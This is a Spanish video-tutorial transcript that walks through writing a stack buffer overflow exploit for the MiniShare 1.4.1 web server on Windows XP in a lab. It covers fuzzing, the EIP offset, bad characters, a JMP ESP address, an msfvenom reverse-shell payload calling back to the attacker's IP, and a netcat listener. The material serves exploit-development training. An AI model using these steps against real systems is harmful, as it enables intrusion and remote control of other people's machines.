Hola a todos, quiero daros la bienvenida a este vídeo, el cual va a ser muy interesante. Hablaremos acerca de los buffer overflow en sistemas Windows 32 bits. Más concretamente vamos a ver todo el proceso que hay que seguir para desarrollar un exploit para una vulnerabilidad de un determinado programa. En nuestro caso vamos a desarrollar un exploit muy sencillo con un programa vulnerable, lógicamente, en este caso un servidor web llamado Minishare en su versión 1.4.1. Cabe destacar que esto lo hago de manera que toda persona pueda aprender. Lo voy a hacer desde cero, explicando conceptos básicos hasta entrar en materia, en la parte práctica. Muy bien, vamos a ver la finalidad de esto. Bueno, lo primero de todo es entender cómo funciona un buffer overflow y un exploit, aprender a desarrollar exploits propios, diferenciarse del resto, ayudar a candidatos a OSCP u otras certificaciones del mundo de la seguridad informática y dejar de ser un script kid. Y con esto me refiero a empezar a desarrollar nosotros nuestros propios exploits y dejar de depender de exploits de otros profesionales del sector o de herramientas de botón gordo como Metasploit. Muy bien, vamos a ver el laboratorio. El laboratorio consta de dos partes. En la parte izquierda tenemos la máquina atacante, la cual va a ser un Kali Linux. En mi caso, podéis utilizar otras distribuciones enfocadas a seguridad informática, como por ejemplo Parrot Security, no hay ningún tipo de problema. Y a mi derecha pues está la máquina vulnerable, la cual va a ser un Windows XP, en mi caso un Windows XP Servipack 2, pero bueno, esto no va a cambiar mucho. Utilizamos Windows XP principalmente porque para iniciarse es mucho mejor, el desarrollo de exploits en estos sistemas es mucho más fácil ya que hay menos protecciones. Muy bien. Y dentro de XP vamos a necesitar instalar tres cositas. La primera de ellas es Python 2.7.1, podéis descargar Python 3, pero bueno, os recomiendo utilizar esta versión porque el código que vamos a desarrollar está destinado para Python 2.7 y si lo hacéis en Python 3 habrá ligeras modificaciones. Muy bien, después tenemos el Immunity Debugger que nos va a permitir analizar qué va ocurriendo en el programa. Muy bien, y el Immunity Debugger vamos a añadirle un módulo que se llama mona.py, está desarrollado en Python, el cual nos va a añadir muchas funcionalidades que para el desarrollo de exploits nos van a venir muy bien. Y por último tenemos el servidor web vulnerable, el programa vulnerable, para el cual vamos a desarrollar el exploit, que es Minishare 1.4.1. Muy bien, continuamos. Vamos a ver estos conceptos básicos que he dicho. Hay gente que ya los conocerá, pero bueno, os recomiendo volver a verlos, por muy básicos que parezcan, siempre está bien volver a ver las cosas. Bueno, un buffer overflow, ¿cuándo ocurre? Ocurre cuando un programa no controla adecuadamente la cantidad de datos que se copian sobre un área de memoria reservada. Y existen dos tipos. Tenemos, en primer lugar, el Stack-Based Overflow, es cuando el desbordamiento se produce en la pila o el stack, y después tenemos el Heap-Based Overflow, cuando el desbordamiento se produce en el montículo o heap. Muy bien, ¿qué es un exploit? La mayoría lo sabemos, es un software capaz de aprovecharse de una vulnerabilidad de seguridad de un sistema y lograr modificar el comportamiento de este. La pila o el stack, que es la zona de la memoria en la cual se van guardando datos que más adelante deben ser recuperados. Después tenemos los registros en arquitecturas de 32 bits por 86. En nuestro caso vamos a ver las dos que vamos a utilizar, los dos registros que vamos a utilizar para desarrollar nuestro exploit. Hay muchos más registros, os recomiendo verlos. Pero bueno, vamos a ello. El SP, que controla la parte superior de la pila, y el IP, que apunta a la dirección de memoria de la siguiente instrucción a ejecutar por el microprocesador, por la CPU. El lenguaje ensamblador. Bueno, esto es muy sencillo, es un lenguaje de programación de bajo nivel. También se podría definir como el conjunto de mnemónicos que representan instrucciones básicas para los computadores, microprocesadores, microcontroladores y otros circuitos integrados programables. Instrucciones de ensamblador. Tenemos dos. Tenemos JMP y NOP, lo mismo, las que vamos a utilizar para desarrollar este exploit.
No quiere decir que no haya más, hay muchos más también, importante mirarlo. Y bueno, JMP, que hace referencia a jump, es decir, salta a una dirección de memoria, y NOP, no operation, que básicamente no realiza ninguna operación. Y el NOP se representa de esta manera, con una barra invertida x90. Muy bien, protecciones de memoria. No vamos a necesitar esto porque estamos en un sistema Windows XP y no nos va a afectar, pero cuando empecéis a desarrollar exploits en sistemas superiores, con versiones superiores como Windows 7, ya os vais a encontrar con estos conceptos y está bien que los tengáis en cuenta para cuando queráis avanzar. Muy bien, DEP, conjunto de tecnologías hardware y software que realizan comprobaciones adicionales de la memoria para ayudar a evitar que el código malicioso se ejecute en el sistema. Ya SLR, que lo veréis en Linux también bastante, aleatoriza las direcciones base de las aplicaciones cargadas y DLLs cada vez que se inicia el sistema operativo. Muy bien. Continuamos, un debugger. Un debugger, muy sencillo, una herramienta que nos permite estudiar el comportamiento del código creado en lenguaje ensamblador o en un lenguaje de alto nivel. Las partes de un debugger son 4, las principales. Tenemos arriba a la izquierda las instrucciones de CPU, es decir, el desensamblado. Vemos todo el código en lenguaje ensamblador, podemos ver instrucciones JMP, NOPs, las que hemos visto anteriormente, mov, add, etc. Registros y flags, pues básicamente arriba tenemos los registros, tenemos por ejemplo el registro SP, el EIP, el EBP, etcétera, y después tenemos las flags, tenemos flag A, flag Z, S. Bueno, las flags no nos van a hacer falta, pero bueno, está bien saber que se encuentran ahí. El dump de la memoria o volcado y el stack o pila. Vale, los botones más utilizados del debugger. Bueno, yo he puesto 2 básicamente para que tengáis en cuenta los atajos, que son muy útiles para desarrollar nuestros exploits de una manera más rápida. Tenemos el de reiniciar programa, que sería utilizando la combinación de teclas control más F2, y ejecutar programa, que es pulsando F9. Muy bien. El fuzzing. El fuzzing es una parte muy importante en el desarrollo de exploits. Es la técnica que consiste en enviar datos en uno de los puntos de entrada de la aplicación. Básicamente al final lo que vamos a conseguir es crashear la aplicación normalmente, si esta es vulnerable a buffer overflow, porque vamos a estar mandando tantos datos que al final la aplicación no va a poder con ello. Entonces, ¿cuáles son los puntos de entrada de la aplicación? Os estaréis preguntando. Pues es muy sencillo. Por ejemplo, en FTP tenemos comandos como user, pass, etcétera, en los cuales en vez de mandar un usuario en user, por ejemplo, podríamos mandar un montón de caracteres hasta llegar a desbordar el buffer, ¿no? Es bastante sencillo. Y en HTTP, por ejemplo, podríamos mandar peticiones GET, POST, con muchos caracteres, lo mismo, hasta llegar a crashear. Vamos a ver primero la revisión de la vulnerabilidad, es decir, informarnos un poco acerca de qué va la vulnerabilidad. Es muy sencillo, simplemente buscáis un exploit que ya esté hecho en Exploit Database para encontrar la CVE. La CVE es un código que identifica a las diferentes vulnerabilidades, ¿no? Como veis está lo que está ahí marcado en rojo. Hacéis clic, es un enlace, y esto os llevará a la lista CVE de Mitre, que aquí básicamente pues se encuentran las vulnerabilidades más comunes y brechas. Bueno, y abajo tenemos una descripción un poco más técnica acerca de qué trata este buffer overflow. Podemos ver que nos pone que es un buffer overflow en Minisaer 1.4.1 vía una petición HTTP GET larga. Por lo tanto, ya sabemos que nuestro punto de entrada va a ser básicamente GET. Vamos a tener que enviar una petición GET. Muy bien, vamos a crear nuestro fuzzer. Voy a explicar un poquito cómo va todo esto, el código. En primer lugar, aquí arriba importamos el módulo socket de Python. Después definimos las diferentes variables que van a contener el buffer. En primer lugar, tenemos que indicar el método HTTP, que va a ser get. Esto lo dejamos vacío por ahora. La cabecera HTTP, que trabaja en la versión de protocolo 1.1 de HTTP.
Y aquí empezamos el bucle while true. El bucle while true es un bucle infinito. Esto quiere decir que hasta que no ocurra un error, por ejemplo, el bucle no se va a detener. Por eso tenemos un except. Except sirve para que cuando pues ocurra un error, básicamente va a hacer un exit, como veis, y nos va a decir que el servidor ha crasheado con X número de bytes. Bueno, y en el try tenemos un poco lo que va a hacer. En primer lugar, vamos a crear un objeto socket. Aquí tenemos af_inet. Básicamente esto es un parámetro que indica que vamos a utilizar un dominio o una dirección IPv4. En nuestro caso va a ser una dirección IPv4 que se encuentra aquí. Y sockstream lo que indica es que estamos haciendo referencia para crear un cliente TCP. Todo esto es un cliente TCP al fin y al cabo. Aquí tenemos barra invertida x41. Esto es la representación de la letra A en hexadecimal. Y ya está, es muy sencillo. Vamos a mandar 100 veces. Esto se va a ir incrementando, es decir, va a mandar 100 hash, 200 hash, 300 hash, hasta que el servidor crashee. Bueno, pues vamos a verlo en funcionamiento. Vamos a ir a nuestro Windows XP. Lo primero de todo va a ser abrir Miniser. Vamos a la carpeta de Miniser, lo abrimos. Sucesivamente abrimos el debugger, pulsamos en File, Attach, filtramos por puerto. Vemos que el primero es el puerto 80, que corresponde a Miniser. Y vamos allá, lo abrimos. Aquí pulsamos doble clic y se nos abre ya aquí todo lo necesario. Muy bien. Comprobamos que está el programa en ejecución, estaba pausado, ahora está en running, abajo a la derecha nos lo marca, y una vez que esté en running, pues ya podemos ejecutar nuestro fuzzer. El fuzzer está en la siguiente carpeta, en Miniser Exploit Development. Todos estos archivos estarán en la descripción del vídeo, los podéis utilizar sin ningún tipo de problema. Si abrimos con el idle, vemos que es el mismo código que os he enseñado en la diapositiva anterior. Abrimos, esperamos y vemos que ha ido enviando de 100 en 100, 100, 200, 300 y entre 1700 y 1800 ha crasheado nuestro programa. Esto lo sabemos porque aquí, para empezar, se nos ha puesto en azul. Si entramos al debugger, vemos abajo que nos pone violación de acceso, ¿no? Si miramos el IP, vemos que se ha sobrescrito, es decir, ahora nos pone 41, 41, 41, 41. Esto, 41, corresponde a la A en ASCII. Esta sería la representación en hexadecimal de la letra A. Y bueno, esto está muy bien. Sabemos que entre 1700 y 1800 bytes crashea, pero necesitamos saber el número exacto de bytes antes de sobreescribir IP. Y esto lo vamos a ver ahora. Vamos a volver a la diapositiva y podemos ver que, bueno, aquí lo que acabamos de ver ahora, violación de acceso, 1800 bytes y que se sobrescribe IP. Ahora tenemos que controlar el registro IP. Podemos hacerlo de dos maneras diferentes. Por análisis por prueba y error, es decir, ir fuceando hasta determinar en qué posición se comienza a sobreescribir el registro IP. Por ejemplo, mandamos 1710 bytes, 1720 y así, hasta ver en cuánto se comienza a sobreescribir. O podemos utilizar un patrón para saber cuántos bytes exactos necesitamos antes de sobreescribir IP. Y aquí es donde entra en juego Mona. Mona tiene un comando que es pattern create y al final le indicamos el número de bytes en el que ha crasheado, que en nuestro caso era 1800, y nos va a generar un patrón. Lo vamos a ver ahora. Muy bien, esto lo podemos cerrar. Vamos a poner aquí abajo Mona pattern create 1800. Pulsamos intro, vemos que aquí nos sale un patrón bastante largo. Bueno, nunca lo copiáis de aquí, ¿de acuerdo? Podríais hacerlo, pero os va a dar problemas. De hecho, lo pone aquí. Pone que puede estar truncado. Así que lo que tenéis que hacer es ir a My Computer, C, Program Files, Immunity Inc, Immunity Debugger, y aquí tenéis el archivo, pattern.txt.
Bueno, esto lo vamos a ver aquí en esta diapositiva, ¿vale? Esa es la ruta, ahí está el archivo, y el que nos va a interesar es el ASCII. El ASCII, la representación del patrón en ASCII, es la que vamos a utilizar en offset1.py. Aquí básicamente lo que vamos a hacer es enviar solo esto. Vamos a poner el método HTTP, la cabecera HTTP, y en el buff vamos a mandar todo el patrón. Así podremos saber la cantidad de bytes antes de sobreescribir EIP. Muy bien, yo ya lo tengo. Básicamente lo que tendríamos que hacer aquí es reiniciar la aplicación. Recordar que tenéis los atajos de teclado. Podríais pulsar control más F2 para reiniciar y después F9 para ejecutar el programa. Esperamos a que se abra. Muy bien, ya lo tenemos. Esto lo podemos cerrar, volvemos aquí y tenemos offset1, que es el que acabo de enseñar. Básicamente le pasamos el patrón, lo abro y vemos que nos muestra otra posición de memoria en EIP. Con esta posición de memoria, Mona va a calcular el número de bytes antes de sobreescribir EIP. Ahora lo vais a entender. Ponemos Mona pattern offset seguido de la dirección de memoria que había en EIP. Y vemos que nos pone que en la posición 1787. Entonces, cuando enviemos 1788, ahí ya estamos reemplazando, sobreescribiendo EIP. O sea que este es el número de bytes antes de sobreescribir EIP. Muy bien. Lo podemos ver aquí. El siguiente paso que vamos a tomar, bueno, aquí veis lo que acabamos de hacer, 1787, tal, le mandamos la dirección de memoria de IP. Y bueno, aquí el siguiente paso, vamos a enviar 1787 AS, que estas son las que hay que poner antes de sobreescribir EIP. B, que esto lo que va a hacer es sobreescribir EIP, porque si os acordáis teníamos 441, es decir, podemos llegar a sobreescribir con 4 caracteres, ¿no? Y luego tenemos ya C, que aquí será donde introduzcamos nuestra shellcode. Muy bien. Vamos allá, vamos de nuevo aquí. Reiniciamos la aplicación. Le damos que yes. Abrimos esto, iniciamos. Y ahora veréis lo que va a ocurrir. Offset 2, aquí lo tenemos. Mandamos 1787 AS. Y vemos que en EIP nos sale 42, 42, 42, 42. Esto es porque son Bs, básicamente. Son las 4 Bs que le estamos enviando. Primero le mandamos las AS. De hecho, lo podemos ver aquí. Las AS corresponden a 41, como veis aquí. Después tenemos las 4 Bs, que son 42, 42, 42, 42. Y después todas las Cs, que ahí iría nuestra shellcode. Muy bien. Entonces, vamos a continuar. Esto ya lo tenemos. Lo que acabo de decir. Vemos nuestras Cs. Violación de acceso otra vez. Y el EIP que se modifica a lo que queremos. Ya podemos controlar EIP. Vamos a hablar de los bad characters. Los bad characters son caracteres que se consideran malos. Y estos se deben evitar en el string, la dirección de retorno y el shellcode. Los bad chars más comunes que deberíamos evitar ya de primeras son el 00, que corresponde al byte nulo, null, el 0A a nueva línea, line feed, el 0D, retorno de carro, carriage return, y el FF, salto de formato, form feed. Muy bien. Nosotros no los vamos a evitar de primeras. Vamos a ver el proceso que habría que hacer para detectar estos caracteres malos. Muy bien. Entonces, ¿cómo podemos buscar los bad chars? Tenemos que generar una lista en hexadecimal con los caracteres ASCII de 0 a 255. Tenemos, por ejemplo, este script en Perl, que está bien, pero podemos hacerlo aún más rápido mediante Mona. Ponemos Mona byte array y listo, y ya lo tenemos. Así que vamos a hacerlo de esta manera. Vamos aquí, ponemos Mona byte array. Aquí ha habido
un problema, he puesto una barra baja, ahora sí. Muy bien, ya tenemos aquí todo nuestro array, como veis. Y este también se guarda en la carpeta de Immunity Debugger. Lo tenéis aquí. Y lo podéis copiar sin ningún tipo de problema. Vale, pues vamos a continuar. Vamos ya a pasar a Batchars 1. Esto lo podemos abrir con el idle. Y básicamente lo que vamos a hacer es mandarle el mismo buffer de antes. Y además, después del access, vamos a enviar los batchars. Todos los caracteres, todo el array de caracteres. Muy bien, para identificar caracteres malos. Vale, reiniciamos esto, le damos que yes. Vamos a cerrar los logs que ya no nos hacen falta, nos estorban. También tenéis aquí una cosita que podéis dar a Appearance, Font y seleccionar esta que se ve mucho más clara. Y os la recomiendo. Vale. Ejecutamos batchars. Vemos que nos da un error. Vamos a la diapositiva primero, antes de hacer nada. Vale, veis aquí tenemos el código. Muy bien, lo que acabamos de ver hasta ahora. Y entonces vamos a ejecutar el batchar este y miraremos la dirección de SP, le daremos clic derecho a Following Dump para seguir en el volcado. Bueno, vamos a verlo ya desde aquí. Iniciamos la aplicación, por eso nos ha dado un error antes. Ahora está, muy bien. Ejecutamos batchars. Vale, nos sobrescribe EIP, todo perfecto. Y ahora en SP vamos a hacer clic derecho, Following Dump, para que nos lo muestre aquí en el volcado. Vamos a bajar y debajo de nuestra access pues tenemos todo el array de caracteres que teníamos. Y vemos que el primero no nos lo representa bien. Esto lo vamos a ver muy bien en la diapositiva ahora. Vemos que este no nos lo ha representado correctamente, ya que nos tendría que haber mostrado un 00, que es lo que le estamos enviando en el array, ¿no? El 00 no lo representa bien. Y si el 00 no lo representa bien, todo el resto tampoco lo va a representar, ¿vale? Hace que todo el resto de código falle y por eso hay que tener en cuenta los batchars y evitarlos. Entonces, ¿qué vamos a hacer? Eliminarlo de nuestro array. Vemos que ya no está el x00, ahora solo está el x01 en adelante. Pues nada, simplemente hacemos eso. Entonces, vamos a abrir Batchars 2. Bueno, primero reiniciamos la aplicación, la ejecutamos. Listo. Y abrimos Batchars 2. Hacemos lo mismo en SP, clic derecho, Following Dump. Bajamos aquí, vemos que ya nos representa el 01, el 02, el 03, el 04, el 07, el 08, tal. Perfecto, pero vemos que 0A, 0B, 0C, 0D ya da problemas. Nos sale un 0A en vez de un 0D. Por lo tanto, 0D es un batchar. También lo tenemos que eliminar de nuestro array. Vemos que el resto ya nos muestra 00, por lo tanto, ese es el carácter malo. Lo volvemos a ver en la diapositiva. Following Dump, lo que hemos hecho. Vemos que el 0D da problemas. Bueno, aquí nos marca 0A, pero debería salir 0D, como aquí. Entonces, pues lo mismo. Hacemos otro archivo más, Batchars 3. Esto es un poco aburrido, puede ser. Por eso hay que evitarlos desde el primer momento, pero está bien para entender el concepto. Vale, pues aquí ya hemos eliminado el 00, el 0D, vemos que tendría que estar ahí, entre el 0C y el 0E, lo hemos eliminado. Y vamos a ver si esto ya no nos da problemas. Abrimos, bueno, primero ejecutamos Miniser. Y ahora sí, Batchars 3, Following Dump en SP, bajamos y vemos que ahora sí. Ahora ya nos muestra todo el resto de caracteres hasta incluso el FF, que es el último del array. Porque habíamos dicho que hasta 255. Por lo tanto, vemos, ya nos muestra todo el resto, como he dicho. Entonces, perfecto. Ya tenemos los batchars encontrados. Y como curiosidad, pues eran los de antes.
porque son súper típicos los que habíamos mencionado antes. El byte nulo y el retorno de carro, 00, 0D. Vale, vamos a buscar una instrucción de salto ASP ahora. ¿Cómo se hace esto? Ponemos mona jmp-r esp, lo ponemos aquí. Una instrucción de salto. Muy bien, esto nos va a abrir un log ahora. Vale, ya lo tenemos. A ver si aquí podemos hacerlo un poquito más grande con OEM. La fuente OEM, ya os digo, es mucho mejor. Lo va a agradecer vuestra vista. Y bueno, aquí nos muestra las diferentes DLL que podemos utilizar, ya que contienen una función, bueno, sí, una instrucción de salto. JMP habíamos dicho que era jump, y esto lo que nos va a permitir es saltar al registro ESP. Entonces, necesitamos ponerle esto en EIP, en el registro IP, porque de esta manera va a saltar a SP, que en SP es donde va a estar nuestra shellcode. Ahora lo vemos. Entonces tenemos diferentes DLL. Muy bien. La que nos va a interesar en nuestro caso va a ser esta de sistema. Hay que fijarse mucho que sean de sistema. En caso de sistemas antiguos como Windows XP, el que estamos utilizando. Ya en Windows 7 y tal tenéis que buscar DLLs de la propia aplicación, porque pueden tener la protección de memoria SLR activada y esto os puede dar problemas. Entonces, nos vamos a quedar con la dirección de memoria que nos aparezca aquí. En nuestro caso creo que acaba en 5F. Vamos a ver si no ha cambiado. Aquí la tenemos, perfecto. Esta es la que vamos a utilizar. Haríamos clic derecho, copy address, copy to clipboard address, y esto ya lo pondríamos en en nuestro caso no sé si es el exploit ya. Voy a pasar a la siguiente diapositiva. Sí, ya vamos a pasar al exploit. Bueno, pues la guardamos por ahora, esta dirección de memoria, ¿de acuerdo? Vamos a explicar Big Endian y Little Endian. Vale, tenemos la dirección de memoria que hemos encontrado. En este caso vamos a utilizar este ejemplo. Imaginar que es café va b. Pues en Big Endian se almacena igual, café va b. Pero si es en Little Endian sería al revés. Sería b va c k. Vamos a verlo con nuestra dirección de memoria para entenderlo mejor. En Big Endian tenemos esta, que es la 7C A7 A5 5F, y en Little Endian pues al revés. Muy bien, pues en nuestro exploit tenemos que marcarlo en Little Endian, representárselo en Little Endian. Por eso estamos viendo este concepto. Vamos a generar nuestra shellcode. Nuestra shellcode se genera con msvenom, por ejemplo. Para ello vamos a utilizar el siguiente comando. Primero vamos a ver el comando como tal. Lo voy a hacer un poquito más grande y lo vemos aquí. Vale, este es el comando que vamos a utilizar. Básicamente ponemos msfvenom-p el payload que queramos, que ahora lo vamos a ver. lhost igual la IP del atacante, lport igual el puerto del atacante, -b los caracteres malos que hemos encontrado y -f para indicarle el lenguaje de programación en el cual queremos que se genere nuestra shellcode. Vamos a ver ya un ejemplo real para nuestro caso. Lo ponemos aquí y vemos msfvenom-p Windows Shell Reverse TCP y lhost nuestra IP de nuestra máquina. Si hacemos ipconfig o IPA vemos que corresponde, que es la 378, así que perfecto, ya lo tenemos. -b los caracteres malos que hemos encontrado, que son el barra invertida x00 y el barra invertida x0d, 00 y 0d, y -f en Python, lo queremos en formato Python. Le damos a intro y esto nos va a generar la shellcode que vamos a necesitar para nuestro exploit. Ya la tenemos aquí. Habría que copiarla de aquí hasta aquí. Esto lo copiaríamos. Muy bien. Yo voy a borrar esto por ahora. Vamos a XP. Vamos a abrir el exploit ya para que se vea. Esto lo voy a ir reiniciando. Mientras tanto, CPU.
Aquí tenemos el exploit. Bueno, vamos a ver primero el workflow de la explotación que vamos a hacer. Vamos a mandar 1787 caracteres A, como habíamos hecho antes, hasta llegar a IP. Después, la dirección de memoria con la instrucción JMPSP, que es esa, la 7C A7 A5 5F, pero nosotros la representaremos en Little Endian. En tercer lugar, vamos a mandar 20 nops. En caso de no funcionar, hay que variar el valor. Y por último, el shellcode. ¿Por qué utilizamos nops? Para evitar problemas. Los nops permiten que la ejecución continúe hasta que se encuentre algo que ejecutar. En nuestro caso, la shell de Metasploit. Si EIP aterrizara 4 bytes en la secuencia nops, no importaría porque se deslizaría hasta alcanzar el shellcode. Pero si los nops no estuvieran ahí, EIP podría aterrizar 4 bytes en nuestro shellcode, saltándose un montón de instrucciones y causando que el exploit falle. ¿De acuerdo? Entonces, aquí tenemos el exploit final. Importamos socket, creamos un objeto socket, nos conectamos. Ahora ya no a la dirección de loopback, ya no a localhost, sino a vamos al servidor, a la IP del servidor de Miniser, en el puerto 80, el método http-get, todo el buff aquí, aquí las 1787 A's, la dirección de memoria de salto a SP, representada en Little Endian, como veis, al revés, los 20 nops, representados con barra invertida x90, y el buff, que básicamente es todo esto, la shellcode, ¿no? Bueno, pues vamos a mandar esto. Básicamente ya copiamos el código, esto ya en Kali. Esto ya va a ir a la máquina atacante. Iniciamos nuestro Miniser, ¿de acuerdo? Vamos a Kali. Creamos un archivo, exploit.py. Ponemos todo el código. Y podemos verlo. Ahí está, perfecto. Preparamos para lanzarlo. Pero antes ponemos a la escucha con netcat nc-lvnp 444, que era el puerto que habíamos elegido. Vamos a ponerlo ahí en grande. Y lanzamos el exploit. Con Python, Python exploit.py. Y esto nos debería devolver una shell. Listo, como veis ya tenemos una shell. En Microsoft Windows XP podríamos hacer un ipconfig. Como veis estamos realmente en la máquina de Miniser. Y por último quiero enseñaros un payload curioso que se utiliza en muchas pruebas de concepto, lo vais a ver en muchas POCs. Básicamente lo que hace es abrir una calculadora, tan sencillo como eso. Simplemente tenemos que cambiar el payload, en vez de Windows reverse TCP, Windows/exec, cmd igual comillas dobles, y entre las comillas dobles lo que queremos ejecutar, en este caso calc.exe. Vamos a verlo en Windows XP, ya he modificado el exploit, tengo Miniser abierto. Como veis es mucho más pequeño el shellcode y simplemente le damos a run, nos da un error y nos ejecuta aquí la calculadora. Y bueno, esto ha sido todo, espero que os haya gustado, os animo a seguir practicando. El mundo del buffer overflow es muy interesante, puede dar un poco miedo al principio, pero luego acaba gustando mucho. Hasta la próxima.